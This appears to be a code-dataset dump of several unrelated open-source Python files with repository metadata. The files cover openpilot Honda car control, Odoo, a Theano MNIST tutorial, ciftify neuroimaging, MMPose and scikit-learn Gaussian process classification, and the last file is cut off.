ret.safetyConfigs[0].safetyParam |= Panda.FLAG_HONDA_NIDEC_ALT if ret.openpilotLongitudinalControl and candidate in HONDA_BOSCH: ret.safetyConfigs[0].safetyParam |= Panda.FLAG_HONDA_BOSCH_LONG # min speed to enable ACC. if car can do stop and go, then set enabling speed # to a negative value, so it won't matter. Otherwise, add 0.5 mph margin to not # conflict with PCM acc ret.minEnableSpeed = -1. if (stop_and_go or ret.enableGasInterceptor) else 25.5 * CV.MPH_TO_MS # TODO: get actual value, for now starting with reasonable value for # civic and scaling by mass and wheelbase ret.rotationalInertia = scale_rot_inertia(ret.mass, ret.wheelbase) # TODO: start from empirically derived lateral slip stiffness for the civic and scale by # mass and CG position, so all cars will have approximately similar dyn behaviors ret.tireStiffnessFront, ret.tireStiffnessRear = scale_tire_stiffness(ret.mass, ret.wheelbase, ret.centerToFront, tire_stiffness_factor=tire_stiffness_factor) ret.steerActuatorDelay = 0.1 ret.steerRateCost = 0.5 ret.steerLimitTimer = 0.8 return ret @staticmethod def init(CP, logcan, sendcan): if CP.carFingerprint in HONDA_BOSCH and CP.openpilotLongitudinalControl: disable_ecu(logcan, sendcan, bus=1, addr=0x18DAB0F1, com_cont_req=b'\x28\x83\x03') # returns a car.CarState def update(self, c, can_strings): # ******************* do can recv ******************* self.cp.update_strings(can_strings) self.cp_cam.update_strings(can_strings) if self.cp_body: self.cp_body.update_strings(can_strings) ret = self.CS.update(self.cp, self.cp_cam, self.cp_body) ret.canValid = self.cp.can_valid and self.cp_cam.can_valid and (self.cp_body is None or self.cp_body.can_valid) ret.yawRate = self.VM.yaw_rate(ret.steeringAngleDeg * CV.DEG_TO_RAD, ret.vEgo) buttonEvents = [] if self.CS.cruise_buttons != self.CS.prev_cruise_buttons: be = car.CarState.ButtonEvent.new_message() be.type = ButtonType.unknown if self.CS.cruise_buttons != 0: be.pressed = True but = self.CS.cruise_buttons else: be.pressed = False but = self.CS.prev_cruise_buttons if but == CruiseButtons.RES_ACCEL: be.type = ButtonType.accelCruise elif but == CruiseButtons.DECEL_SET: be.type = ButtonType.decelCruise elif but == CruiseButtons.CANCEL: be.type = ButtonType.cancel elif but == CruiseButtons.MAIN: be.type = ButtonType.altButton3 buttonEvents.append(be) if self.CS.cruise_setting != self.CS.prev_cruise_setting: be = car.CarState.ButtonEvent.new_message() be.type = ButtonType.unknown if self.CS.cruise_setting != 0: be.pressed = True but = self.CS.cruise_setting else: be.pressed = False but = self.CS.prev_cruise_setting if but == 1: be.type = ButtonType.altButton1 # TODO: more buttons? buttonEvents.append(be) ret.buttonEvents = buttonEvents # events events = self.create_common_events(ret, pcm_enable=False) if self.CS.brake_error: events.add(EventName.brakeUnavailable) if self.CS.park_brake: events.add(EventName.parkBrake) if self.CP.pcmCruise and ret.vEgo < self.CP.minEnableSpeed: events.add(EventName.belowEngageSpeed) if self.CP.pcmCruise: # we engage when pcm is active (rising edge) if ret.cruiseState.enabled and not self.CS.out.cruiseState.enabled: events.add(EventName.pcmEnable) elif not ret.cruiseState.enabled and (c.actuators.accel >= 0. or not self.CP.openpilotLongitudinalControl): # it can happen that car cruise disables while comma system is enabled: need to # keep braking if needed or if the speed is very low if ret.vEgo < self.CP.minEnableSpeed + 2.: # non loud alert if cruise disables below 25mph as expected (+ a little margin) events.add(EventName.speedTooLow) else: events.add(EventName.cruiseDisabled) if self.CS.CP.minEnableSpeed > 0 and ret.vEgo < 0.001: events.add(EventName.manualRestart) # handle button presses for b in ret.buttonEvents: # do enable on both accel and decel buttons if b.type in [ButtonType.accelCruise, ButtonType.decelCruise] and not b.pressed: if not self.CP.pcmCruise: events.add(EventName.buttonEnable) # do disable on button down if b.type == ButtonType.cancel and b.pressed: events.add(EventName.buttonCancel) ret.events = events.to_msg() self.CS.out = ret.as_reader() return self.CS.out # pass in a car.CarControl # to be called @ 100hz def apply(self, c): if c.hudControl.speedVisible: hud_v_cruise = c.hudControl.setSpeed * CV.MS_TO_KPH else: hud_v_cruise = 255 can_sends = self.CC.update(c.enabled, c.active, self.CS, self.frame, c.actuators, c.cruiseControl.cancel, hud_v_cruise, c.hudControl.lanesVisible, hud_show_car=c.hudControl.leadVisible, hud_alert=c.hudControl.visualAlert) self.frame += 1 return can_sends
45.465632
163
0.674762
4a7b23dde1a5c9845c0a9350805145cd32c7dbf0
396
py
Python
steelscript/steelhead/core/__init__.py
riverbed/steelscript-steelhead
7158578f7ad97eaff9968b2aca82da2d322284ba
[ "MIT" ]
3
2016-04-08T03:27:08.000Z
2019-08-14T07:01:54.000Z
steelscript/steelhead/core/__init__.py
riverbed/steelscript-steelhead
7158578f7ad97eaff9968b2aca82da2d322284ba
[ "MIT" ]
null
null
null
steelscript/steelhead/core/__init__.py
riverbed/steelscript-steelhead
7158578f7ad97eaff9968b2aca82da2d322284ba
[ "MIT" ]
3
2018-05-22T14:52:47.000Z
2020-09-23T01:07:00.000Z
# Copyright (c) 2019 Riverbed Technology, Inc. # # This software is licensed under the terms and conditions of the MIT License # accompanying the software ("License"). This software is distributed "AS IS" # as set forth in the License. """ The SteelHead package offers a set of interfaces to control and work with a SteelHead appliance. """ from steelscript.steelhead.core.steelhead import *
28.285714
78
0.762626
cc423c2d3a5e722e189db55f69a7b391acde6dbf
1,087
py
Python
addons/account/models/res_users.py
jjiege/odoo
fd5b8ad387c1881f349d125cbd56433f4d49398f
[ "MIT" ]
null
null
null
addons/account/models/res_users.py
jjiege/odoo
fd5b8ad387c1881f349d125cbd56433f4d49398f
[ "MIT" ]
null
null
null
addons/account/models/res_users.py
jjiege/odoo
fd5b8ad387c1881f349d125cbd56433f4d49398f
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- # Part of Odoo. See LICENSE file for full copyright and licensing details. from odoo import api, models, _ from odoo.exceptions import ValidationError class Users(models.Model): _inherit = "res.users" @api.multi @api.constrains('groups_id') def _check_one_user_type(self): super(Users, self)._check_one_user_type() g1 = self.env.ref('account.group_show_line_subtotals_tax_included', False) g2 = self.env.ref('account.group_show_line_subtotals_tax_excluded', False) if not g1 or not g2: # A user cannot be in a non-existant group return if self._has_multiple_groups([g1.id, g2.id]): raise ValidationError(_("A user cannot have both Tax B2B and Tax B2C.\n" "You should go in General Settings, and choose to display Product Prices\n" "either in 'Tax-Included' or in 'Tax-Excluded' mode\n" "(or switch twice the mode if you are already in the desired one)."))
38.821429
111
0.620975
599f56583bc4faa499d44931c73abfb965a9026e
16,081
py
Python
code/model/mlp/logistic_sgd.py
fegonda/icon_demo
d2d1b0148989187c1433597f9c3ae4357178c082
[ "MIT" ]
92
2016-03-05T23:33:13.000Z
2022-01-12T11:44:16.000Z
logistic_sgd.py
deepanjanroy/aml3
e70999c77a8d4d9c40cdceb1168922e5cd5ea40d
[ "MIT" ]
4
2016-06-03T14:07:19.000Z
2018-11-18T14:04:57.000Z
logistic_sgd.py
deepanjanroy/aml3
e70999c77a8d4d9c40cdceb1168922e5cd5ea40d
[ "MIT" ]
46
2016-05-25T13:59:30.000Z
2022-02-08T12:10:33.000Z
""" This tutorial introduces logistic regression using Theano and stochastic gradient descent. Logistic regression is a probabilistic, linear classifier. It is parametrized by a weight matrix :math:`W` and a bias vector :math:`b`. Classification is done by projecting data points onto a set of hyperplanes, the distance to which is used to determine a class membership probability. Mathematically, this can be written as: .. math:: P(Y=i|x, W,b) &= softmax_i(W x + b) \\ &= \frac {e^{W_i x + b_i}} {\sum_j e^{W_j x + b_j}} The output of the model or prediction is then done by taking the argmax of the vector whose i'th element is P(Y=i|x). .. math:: y_{pred} = argmax_i P(Y=i|x,W,b) This tutorial presents a stochastic gradient descent optimization method suitable for large datasets. References: - textbooks: "Pattern Recognition and Machine Learning" - Christopher M. Bishop, section 4.3.2 """ __docformat__ = 'restructedtext en' import cPickle import gzip import os import sys import time import numpy import theano import theano.tensor as T class LogisticRegression(object): """Multi-class Logistic Regression Class The logistic regression is fully described by a weight matrix :math:`W` and bias vector :math:`b`. Classification is done by projecting data points onto a set of hyperplanes, the distance to which is used to determine a class membership probability. """ def __init__(self, input, n_in, n_out): """ Initialize the parameters of the logistic regression :type input: theano.tensor.TensorType :param input: symbolic variable that describes the input of the architecture (one minibatch) :type n_in: int :param n_in: number of input units, the dimension of the space in which the datapoints lie :type n_out: int :param n_out: number of output units, the dimension of the space in which the labels lie """ # start-snippet-1 # initialize with 0 the weights W as a matrix of shape (n_in, n_out) self.W = theano.shared( value=numpy.zeros( (n_in, n_out), dtype=theano.config.floatX ), name='W', borrow=True ) # initialize the baises b as a vector of n_out 0s self.b = theano.shared( value=numpy.zeros( (n_out,), dtype=theano.config.floatX ), name='b', borrow=True ) # symbolic expression for computing the matrix of class-membership # probabilities # Where: # W is a matrix where column-k represent the separation hyper plain for # class-k # x is a matrix where row-j represents input training sample-j # b is a vector where element-k represent the free parameter of hyper # plain-k self.p_y_given_x = T.nnet.softmax(T.dot(input, self.W) + self.b) # symbolic description of how to compute prediction as class whose # probability is maximal self.y_pred = T.argmax(self.p_y_given_x, axis=1) # end-snippet-1 # parameters of the model self.params = [self.W, self.b] def negative_log_likelihood(self, y): """Return the mean of the negative log-likelihood of the prediction of this model under a given target distribution. .. math:: \frac{1}{|\mathcal{D}|} \mathcal{L} (\theta=\{W,b\}, \mathcal{D}) = \frac{1}{|\mathcal{D}|} \sum_{i=0}^{|\mathcal{D}|} \log(P(Y=y^{(i)}|x^{(i)}, W,b)) \\ \ell (\theta=\{W,b\}, \mathcal{D}) :type y: theano.tensor.TensorType :param y: corresponds to a vector that gives for each example the correct label Note: we use the mean instead of the sum so that the learning rate is less dependent on the batch size """ # start-snippet-2 # y.shape[0] is (symbolically) the number of rows in y, i.e., # number of examples (call it n) in the minibatch # T.arange(y.shape[0]) is a symbolic vector which will contain # [0,1,2,... n-1] T.log(self.p_y_given_x) is a matrix of # Log-Probabilities (call it LP) with one row per example and # one column per class LP[T.arange(y.shape[0]),y] is a vector # v containing [LP[0,y[0]], LP[1,y[1]], LP[2,y[2]], ..., # LP[n-1,y[n-1]]] and T.mean(LP[T.arange(y.shape[0]),y]) is # the mean (across minibatch examples) of the elements in v, # i.e., the mean log-likelihood across the minibatch. return -T.mean(T.log(self.p_y_given_x)[T.arange(y.shape[0]), y]) # end-snippet-2 def errors(self, y): """Return a float representing the number of errors in the minibatch over the total number of examples of the minibatch ; zero one loss over the size of the minibatch :type y: theano.tensor.TensorType :param y: corresponds to a vector that gives for each example the correct label """ # check if y has same dimension of y_pred if y.ndim != self.y_pred.ndim: raise TypeError( 'y should have the same shape as self.y_pred', ('y', y.type, 'y_pred', self.y_pred.type) ) # check if y is of the correct datatype if y.dtype.startswith('int'): # the T.neq operator returns a vector of 0s and 1s, where 1 # represents a mistake in prediction return T.mean(T.neq(self.y_pred, y)) else: raise NotImplementedError() def load_data(dataset): ''' Loads the dataset :type dataset: string :param dataset: the path to the dataset (here MNIST) ''' ############# # LOAD DATA # ############# # Download the MNIST dataset if it is not present data_dir, data_file = os.path.split(dataset) if data_dir == "" and not os.path.isfile(dataset): # Check if dataset is in the data directory. new_path = os.path.join( os.path.split(__file__)[0], "..", "data", dataset ) if os.path.isfile(new_path) or data_file == 'mnist.pkl.gz': dataset = new_path if (not os.path.isfile(dataset)) and data_file == 'mnist.pkl.gz': import urllib origin = ( 'http://www.iro.umontreal.ca/~lisa/deep/data/mnist/mnist.pkl.gz' ) print 'Downloading data from %s' % origin urllib.urlretrieve(origin, dataset) print '... loading data' # Load the dataset f = gzip.open(dataset, 'rb') train_set, valid_set, test_set = cPickle.load(f) f.close() #train_set, valid_set, test_set format: tuple(input, target) #input is an numpy.ndarray of 2 dimensions (a matrix) #witch row's correspond to an example. target is a #numpy.ndarray of 1 dimensions (vector)) that have the same length as #the number of rows in the input. It should give the target #target to the example with the same index in the input. def shared_dataset(data_xy, borrow=True): """ Function that loads the dataset into shared variables The reason we store our dataset in shared variables is to allow Theano to copy it into the GPU memory (when code is run on GPU). Since copying data into the GPU is slow, copying a minibatch everytime is needed (the default behaviour if the data is not in a shared variable) would lead to a large decrease in performance. """ data_x, data_y = data_xy shared_x = theano.shared(numpy.asarray(data_x, dtype=theano.config.floatX), borrow=borrow) shared_y = theano.shared(numpy.asarray(data_y, dtype=theano.config.floatX), borrow=borrow) # When storing data on the GPU it has to be stored as floats # therefore we will store the labels as ``floatX`` as well # (``shared_y`` does exactly that). But during our computations # we need them as ints (we use labels as index, and if they are # floats it doesn't make sense) therefore instead of returning # ``shared_y`` we will have to cast it to int. This little hack # lets ous get around this issue return shared_x, T.cast(shared_y, 'int32') test_set_x, test_set_y = shared_dataset(test_set) valid_set_x, valid_set_y = shared_dataset(valid_set) train_set_x, train_set_y = shared_dataset(train_set) rval = [(train_set_x, train_set_y), (valid_set_x, valid_set_y), (test_set_x, test_set_y)] return rval def sgd_optimization_mnist(learning_rate=0.13, n_epochs=1000, dataset='mnist.pkl.gz', batch_size=600): """ Demonstrate stochastic gradient descent optimization of a log-linear model This is demonstrated on MNIST. :type learning_rate: float :param learning_rate: learning rate used (factor for the stochastic gradient) :type n_epochs: int :param n_epochs: maximal number of epochs to run the optimizer :type dataset: string :param dataset: the path of the MNIST dataset file from http://www.iro.umontreal.ca/~lisa/deep/data/mnist/mnist.pkl.gz """ datasets = load_data(dataset) train_set_x, train_set_y = datasets[0] valid_set_x, valid_set_y = datasets[1] test_set_x, test_set_y = datasets[2] # compute number of minibatches for training, validation and testing n_train_batches = train_set_x.get_value(borrow=True).shape[0] / batch_size n_valid_batches = valid_set_x.get_value(borrow=True).shape[0] / batch_size n_test_batches = test_set_x.get_value(borrow=True).shape[0] / batch_size ###################### # BUILD ACTUAL MODEL # ###################### print '... building the model' # allocate symbolic variables for the data index = T.lscalar() # index to a [mini]batch # generate symbolic variables for input (x and y represent a # minibatch) x = T.matrix('x') # data, presented as rasterized images y = T.ivector('y') # labels, presented as 1D vector of [int] labels # construct the logistic regression class # Each MNIST image has size 28*28 classifier = LogisticRegression(input=x, n_in=28 * 28, n_out=10) # the cost we minimize during training is the negative log likelihood of # the model in symbolic format cost = classifier.negative_log_likelihood(y) # compiling a Theano function that computes the mistakes that are made by # the model on a minibatch test_model = theano.function( inputs=[index], outputs=classifier.errors(y), givens={ x: test_set_x[index * batch_size: (index + 1) * batch_size], y: test_set_y[index * batch_size: (index + 1) * batch_size] } ) validate_model = theano.function( inputs=[index], outputs=classifier.errors(y), givens={ x: valid_set_x[index * batch_size: (index + 1) * batch_size], y: valid_set_y[index * batch_size: (index + 1) * batch_size] } ) # compute the gradient of cost with respect to theta = (W,b) g_W = T.grad(cost=cost, wrt=classifier.W) g_b = T.grad(cost=cost, wrt=classifier.b) # start-snippet-3 # specify how to update the parameters of the model as a list of # (variable, update expression) pairs. updates = [(classifier.W, classifier.W - learning_rate * g_W), (classifier.b, classifier.b - learning_rate * g_b)] # compiling a Theano function `train_model` that returns the cost, but in # the same time updates the parameter of the model based on the rules # defined in `updates` train_model = theano.function( inputs=[index], outputs=cost, updates=updates, givens={ x: train_set_x[index * batch_size: (index + 1) * batch_size], y: train_set_y[index * batch_size: (index + 1) * batch_size] } ) # end-snippet-3 ############### # TRAIN MODEL # ############### print '... training the model' # early-stopping parameters patience = 5000 # look as this many examples regardless patience_increase = 2 # wait this much longer when a new best is # found improvement_threshold = 0.995 # a relative improvement of this much is # considered significant validation_frequency = min(n_train_batches, patience / 2) # go through this many # minibatche before checking the network # on the validation set; in this case we # check every epoch best_validation_loss = numpy.inf test_score = 0. start_time = time.clock() done_looping = False epoch = 0 while (epoch < n_epochs) and (not done_looping): epoch = epoch + 1 for minibatch_index in xrange(n_train_batches): minibatch_avg_cost = train_model(minibatch_index) # iteration number iter = (epoch - 1) * n_train_batches + minibatch_index if (iter + 1) % validation_frequency == 0: # compute zero-one loss on validation set validation_losses = [validate_model(i) for i in xrange(n_valid_batches)] this_validation_loss = numpy.mean(validation_losses) print( 'epoch %i, minibatch %i/%i, validation error %f %%' % ( epoch, minibatch_index + 1, n_train_batches, this_validation_loss * 100. ) ) # if we got the best validation score until now if this_validation_loss < best_validation_loss: #improve patience if loss improvement is good enough if this_validation_loss < best_validation_loss * \ improvement_threshold: patience = max(patience, iter * patience_increase) best_validation_loss = this_validation_loss # test it on the test set test_losses = [test_model(i) for i in xrange(n_test_batches)] test_score = numpy.mean(test_losses) print( ( ' epoch %i, minibatch %i/%i, test error of' ' best model %f %%' ) % ( epoch, minibatch_index + 1, n_train_batches, test_score * 100. ) ) if patience <= iter: done_looping = True break end_time = time.clock() print( ( 'Optimization complete with best validation score of %f %%,' 'with test performance %f %%' ) % (best_validation_loss * 100., test_score * 100.) ) print 'The code run for %d epochs, with %f epochs/sec' % ( epoch, 1. * epoch / (end_time - start_time)) print >> sys.stderr, ('The code for file ' + os.path.split(__file__)[1] + ' ran for %.1fs' % ((end_time - start_time))) if __name__ == '__main__': sgd_optimization_mnist()
36.714612
79
0.582551
5d4842c1e6e59a91e18bae3634209faf45079985
6,225
py
Python
ciftify/bin/ciftify_meants.py
lgrennan/ciftify
8488423bd081370614b676a2e1d1a8dbfd9aba1c
[ "MIT" ]
null
null
null
ciftify/bin/ciftify_meants.py
lgrennan/ciftify
8488423bd081370614b676a2e1d1a8dbfd9aba1c
[ "MIT" ]
null
null
null
ciftify/bin/ciftify_meants.py
lgrennan/ciftify
8488423bd081370614b676a2e1d1a8dbfd9aba1c
[ "MIT" ]
null
null
null
#!/usr/bin/env python """ Produces a csv file mean voxel/vertex time series from a functional file <func> within a seed mask <seed>. Usage: ciftify_meants [options] <func> <seed> Arguments: <func> functional data can be (nifti or cifti) <seed> seed mask (nifti, cifti or gifti) Options: --outputcsv PATH Specify the output filename --outputlabels PATH Specity a file to print the ROI row ids to. --mask FILE brainmask (file format should match seed) --roi-label INT Specify the numeric label of the ROI you want a seedmap for --weighted Compute weighted average timeseries from the seed map --hemi HEMI If the seed is a gifti file, specify the hemisphere (R or L) here -v,--verbose Verbose logging --debug Debug logging -h, --help Prints this message DETAILS: The default output filename is <func>_<seed>_meants.csv inside the same directory as the <func> file. This can be changed by specifying the full path after the '--outputcsv' option. The integer labels for the seeds extracted can be printed to text using the '--outputlabels' option. If the seed file contains multiple interger values (i.e. an altas). One row will be written for each integer value. If you only want a timeseries from one roi in an atlas, you can specify the integer with the --roi-label option. A weighted avereage can be calculated from a continuous seed if the --weighted flag is given. If a mask is given, the intersection of this mask and the seed mask will be taken. If a nifti seed if given for a cifti functional file, wb_command -cifti separate will try extract the subcortical cifti data and try to work with that. Written by Erin W Dickie, March 17, 2016 """ import sys import subprocess import os import tempfile import shutil import logging import logging.config import numpy as np import scipy as sp import nibabel as nib from docopt import docopt import ciftify from ciftify.meants import MeantsSettings logger = logging.getLogger('ciftify') logger.setLevel(logging.DEBUG) def run_ciftify_meants(settings): '''run ciftify_meants workflow ''' ## if seed is dlabel - convert to dscalar if ".dlabel.nii" in settings.seed.path: ## apolagise for all the cases where this approach doesn't work.. if settings.weighted: logger.error('--weighted mean time-series cannot be calcualted with a .dlabel.nii seed. Exiting.') sys.exit(1) if settings.roi_label: logger.error("Sorry, --roi-label option doesn't work for .dlabel.nii seed inputs. Exiting.") sys.exit(1) if settings.mask: logger.error("Sorry, --mask option doesn't work for .dlabel.nii seed inputs. Exiting.") sys.exit(1) if not settings.func.type == 'cifti': logger.error("If <seed> is .dlabel.nii, the <func> needs to be a cifti file. Exiting.") sys.exit(1) ## parcellate and then right out the parcellations.. cifti_parcellate_to_meants(settings) else: ## calculated the meants using numpy _ = ciftify.meants.calc_meants_with_numpy(settings, outputlabels = settings.outputlabels) def cifti_parcellate_to_meants(settings): ''' use wb_command -cifti-parcellate to create meants..much faster ''' with ciftify.utils.TempDir() as tempdir: ## parcellate and then right out the parcellations.. if settings.func.path.endswith('dtseries.nii'): tmp_parcelated = os.path.join(tempdir, 'parcellated.ptseries.nii') if settings.func.path.endswith('dscalar.nii'): tmp_parcelated = os.path.join(tempdir, 'parcellated.pscalar.nii') ciftify.utils.run(['wb_command', '-cifti-parcellate', settings.func.path, settings.seed.path, 'COLUMN', tmp_parcelated]) ciftify.utils.run(['wb_command', '-cifti-convert', '-to-text', tmp_parcelated, settings.outputcsv,'-col-delim ","']) if settings.outputlabels: temp_wb_labels = os.path.join(tempdir, 'wb_labels.txt') ciftify.utils.run(['wb_command', '-cifti-label-export-table', settings.seed.path, '1', temp_wb_labels]) ciftify.io.wb_labels_to_csv(temp_wb_labels, csv_out= settings.outputlabels) class UserSettings(MeantsSettings): def __init__(self, arguments): MeantsSettings.__init__(self, arguments) self.outputcsv = self.get_outputcsv(arguments['--outputcsv']) self.outputlabels = self.get_outputlabels(arguments['--outputlabels']) def check_output_path(self, path): ''' use ciftify function to ensure output is writable''' ciftify.utils.check_output_writable(path) return(path) def get_outputcsv(self, outputcsv): ''' determine func and seed filetypes if outputcsv path doesn't exist, make one out of the func and seed names ''' if not outputcsv: outputdir = os.path.dirname(self.func.path) outputcsv = os.path.join(outputdir,self.func.base + '_' + self.seed.base + '_meants.csv' ) outputcsv = self.check_output_path(outputcsv) return(outputcsv) def get_outputlabels(self,outputlabels): '''if outputlabels where specified, check that they are writable ''' if outputlabels: self.check_output_path(outputlabels) return(outputlabels) def main(): arguments = docopt(__doc__) debug = arguments['--debug'] verbose = arguments['--verbose'] ch = logging.StreamHandler() ch.setLevel(logging.WARNING) if verbose: ch.setLevel(logging.INFO) if debug: ch.setLevel(logging.DEBUG) logger.addHandler(ch) ## set up the top of the log logger.info('{}{}'.format(ciftify.utils.ciftify_logo(), ciftify.utils.section_header('Starting ciftify_meants'))) ciftify.utils.log_arguments(arguments) settings = UserSettings(arguments) ret = run_ciftify_meants(settings) logger.info(ciftify.utils.section_header('Done ciftify_meants')) sys.exit(ret) if __name__ == '__main__': main()
36.403509
110
0.675823
981c68d18cfcc3f32b5687822cdb7f1db3df0edb
3,505
py
Python
demo/face_img_demo.py
ssumin6/buob
4fb4537423a993cd2894f54cb12f5f3b3fb73141
[ "Apache-2.0" ]
367
2022-01-14T03:32:25.000Z
2022-03-31T04:48:20.000Z
demo/face_img_demo.py
ssumin6/buob
4fb4537423a993cd2894f54cb12f5f3b3fb73141
[ "Apache-2.0" ]
27
2022-01-27T07:12:49.000Z
2022-03-31T04:31:13.000Z
demo/face_img_demo.py
ssumin6/buob
4fb4537423a993cd2894f54cb12f5f3b3fb73141
[ "Apache-2.0" ]
53
2022-01-18T11:21:43.000Z
2022-03-31T06:42:41.000Z
import os from argparse import ArgumentParser from mmpose.apis import (inference_top_down_pose_model, init_pose_model, vis_pose_result) try: import face_recognition has_face_det = True except (ImportError, ModuleNotFoundError): has_face_det = False def process_face_det_results(face_det_results): """Process det results, and return a list of bboxes. :param face_det_results: (top, right, bottom and left) :return: a list of detected bounding boxes (x,y,x,y)-format """ person_results = [] for bbox in face_det_results: person = {} # left, top, right, bottom person['bbox'] = [bbox[3], bbox[0], bbox[1], bbox[2]] person_results.append(person) return person_results def main(): """Visualize the demo images. Using mmdet to detect the human. """ parser = ArgumentParser() parser.add_argument('pose_config', help='Config file for pose') parser.add_argument('pose_checkpoint', help='Checkpoint file for pose') parser.add_argument('--img-root', type=str, default='', help='Image root') parser.add_argument('--img', type=str, default='', help='Image file') parser.add_argument( '--show', action='store_true', default=False, help='whether to show img') parser.add_argument( '--out-img-root', type=str, default='', help='root of the output img file. ' 'Default not saving the visualization images.') parser.add_argument( '--device', default='cuda:0', help='Device used for inference') parser.add_argument( '--kpt-thr', type=float, default=0.3, help='Keypoint score threshold') assert has_face_det, 'Please install face_recognition to run the demo. ' \ '"pip install face_recognition", For more details, ' \ 'see https://github.com/ageitgey/face_recognition' args = parser.parse_args() assert args.show or (args.out_img_root != '') assert args.img != '' # build the pose model from a config file and a checkpoint file pose_model = init_pose_model( args.pose_config, args.pose_checkpoint, device=args.device.lower()) dataset = pose_model.cfg.data['test']['type'] image_name = os.path.join(args.img_root, args.img) # test a single image, the resulting box is (top, right, bottom and left) image = face_recognition.load_image_file(image_name) face_det_results = face_recognition.face_locations(image) # keep the person class bounding boxes. face_results = process_face_det_results(face_det_results) # optional return_heatmap = False # e.g. use ('backbone', ) to return backbone feature output_layer_names = None pose_results, returned_outputs = inference_top_down_pose_model( pose_model, image_name, face_results, bbox_thr=None, format='xyxy', dataset=dataset, return_heatmap=return_heatmap, outputs=output_layer_names) if args.out_img_root == '': out_file = None else: os.makedirs(args.out_img_root, exist_ok=True) out_file = os.path.join(args.out_img_root, f'vis_{args.img}') # show the results vis_pose_result( pose_model, image_name, pose_results, dataset=dataset, kpt_score_thr=args.kpt_thr, show=args.show, out_file=out_file) if __name__ == '__main__': main()
30.215517
79
0.650214
072cf80dba250eb8e6807e736868104e759ce0a0
33,276
py
Python
site-packages/sklearn/gaussian_process/_gpc.py
linusg/Pyto
eab3c3e093a8cace53d5b9425d1af2f535d456ee
[ "MIT" ]
2
2020-08-25T13:55:00.000Z
2020-08-25T16:36:03.000Z
site-packages/sklearn/gaussian_process/_gpc.py
linusg/Pyto
eab3c3e093a8cace53d5b9425d1af2f535d456ee
[ "MIT" ]
1
2020-04-25T20:36:07.000Z
2020-04-25T20:36:07.000Z
site-packages/sklearn/gaussian_process/_gpc.py
Wristlebane/Pyto
901ac307b68486d8289105c159ca702318bea5b0
[ "MIT" ]
null
null
null
"""Gaussian processes classification.""" # Authors: Jan Hendrik Metzen <jhm@informatik.uni-bremen.de> # # License: BSD 3 clause from operator import itemgetter import numpy as np from scipy.linalg import cholesky, cho_solve, solve import scipy.optimize from scipy.special import erf, expit from ..base import BaseEstimator, ClassifierMixin, clone from .kernels \ import RBF, CompoundKernel, ConstantKernel as C from ..utils.validation import check_X_y, check_is_fitted, check_array from ..utils import check_random_state from ..utils.optimize import _check_optimize_result from ..preprocessing import LabelEncoder from ..multiclass import OneVsRestClassifier, OneVsOneClassifier # Values required for approximating the logistic sigmoid by # error functions. coefs are obtained via: # x = np.array([0, 0.6, 2, 3.5, 4.5, np.inf]) # b = logistic(x) # A = (erf(np.dot(x, self.lambdas)) + 1) / 2 # coefs = lstsq(A, b)[0] LAMBDAS = np.array([0.41, 0.4, 0.37, 0.44, 0.39])[:, np.newaxis] COEFS = np.array([-1854.8214151, 3516.89893646, 221.29346712, 128.12323805, -2010.49422654])[:, np.newaxis] class _BinaryGaussianProcessClassifierLaplace(BaseEstimator): """Binary Gaussian process classification based on Laplace approximation. The implementation is based on Algorithm 3.1, 3.2, and 5.1 of ``Gaussian Processes for Machine Learning'' (GPML) by Rasmussen and Williams. Internally, the Laplace approximation is used for approximating the non-Gaussian posterior by a Gaussian. Currently, the implementation is restricted to using the logistic link function. .. versionadded:: 0.18 Parameters ---------- kernel : kernel object The kernel specifying the covariance function of the GP. If None is passed, the kernel "1.0 * RBF(1.0)" is used as default. Note that the kernel's hyperparameters are optimized during fitting. optimizer : string or callable, optional (default: "fmin_l_bfgs_b") Can either be one of the internally supported optimizers for optimizing the kernel's parameters, specified by a string, or an externally defined optimizer passed as a callable. If a callable is passed, it must have the signature:: def optimizer(obj_func, initial_theta, bounds): # * 'obj_func' is the objective function to be maximized, which # takes the hyperparameters theta as parameter and an # optional flag eval_gradient, which determines if the # gradient is returned additionally to the function value # * 'initial_theta': the initial value for theta, which can be # used by local optimizers # * 'bounds': the bounds on the values of theta .... # Returned are the best found hyperparameters theta and # the corresponding value of the target function. return theta_opt, func_min Per default, the 'L-BFGS-B' algorithm from scipy.optimize.minimize is used. If None is passed, the kernel's parameters are kept fixed. Available internal optimizers are:: 'fmin_l_bfgs_b' n_restarts_optimizer: int, optional (default: 0) The number of restarts of the optimizer for finding the kernel's parameters which maximize the log-marginal likelihood. The first run of the optimizer is performed from the kernel's initial parameters, the remaining ones (if any) from thetas sampled log-uniform randomly from the space of allowed theta-values. If greater than 0, all bounds must be finite. Note that n_restarts_optimizer=0 implies that one run is performed. max_iter_predict: int, optional (default: 100) The maximum number of iterations in Newton's method for approximating the posterior during predict. Smaller values will reduce computation time at the cost of worse results. warm_start : bool, optional (default: False) If warm-starts are enabled, the solution of the last Newton iteration on the Laplace approximation of the posterior mode is used as initialization for the next call of _posterior_mode(). This can speed up convergence when _posterior_mode is called several times on similar problems as in hyperparameter optimization. See :term:`the Glossary <warm_start>`. copy_X_train : bool, optional (default: True) If True, a persistent copy of the training data is stored in the object. Otherwise, just a reference to the training data is stored, which might cause predictions to change if the data is modified externally. random_state : int, RandomState instance or None, optional (default: None) The generator used to initialize the centers. If int, random_state is the seed used by the random number generator; If RandomState instance, random_state is the random number generator; If None, the random number generator is the RandomState instance used by `np.random`. Attributes ---------- X_train_ : array-like of shape (n_samples, n_features) Feature values in training data (also required for prediction) y_train_ : array-like of shape (n_samples,) Target values in training data (also required for prediction) classes_ : array-like of shape (n_classes,) Unique class labels. kernel_ : kernel object The kernel used for prediction. The structure of the kernel is the same as the one passed as parameter but with optimized hyperparameters L_ : array-like of shape (n_samples, n_samples) Lower-triangular Cholesky decomposition of the kernel in X_train_ pi_ : array-like of shape (n_samples,) The probabilities of the positive class for the training points X_train_ W_sr_ : array-like of shape (n_samples,) Square root of W, the Hessian of log-likelihood of the latent function values for the observed labels. Since W is diagonal, only the diagonal of sqrt(W) is stored. log_marginal_likelihood_value_ : float The log-marginal-likelihood of ``self.kernel_.theta`` """ def __init__(self, kernel=None, optimizer="fmin_l_bfgs_b", n_restarts_optimizer=0, max_iter_predict=100, warm_start=False, copy_X_train=True, random_state=None): self.kernel = kernel self.optimizer = optimizer self.n_restarts_optimizer = n_restarts_optimizer self.max_iter_predict = max_iter_predict self.warm_start = warm_start self.copy_X_train = copy_X_train self.random_state = random_state def fit(self, X, y): """Fit Gaussian process classification model Parameters ---------- X : array-like of shape (n_samples, 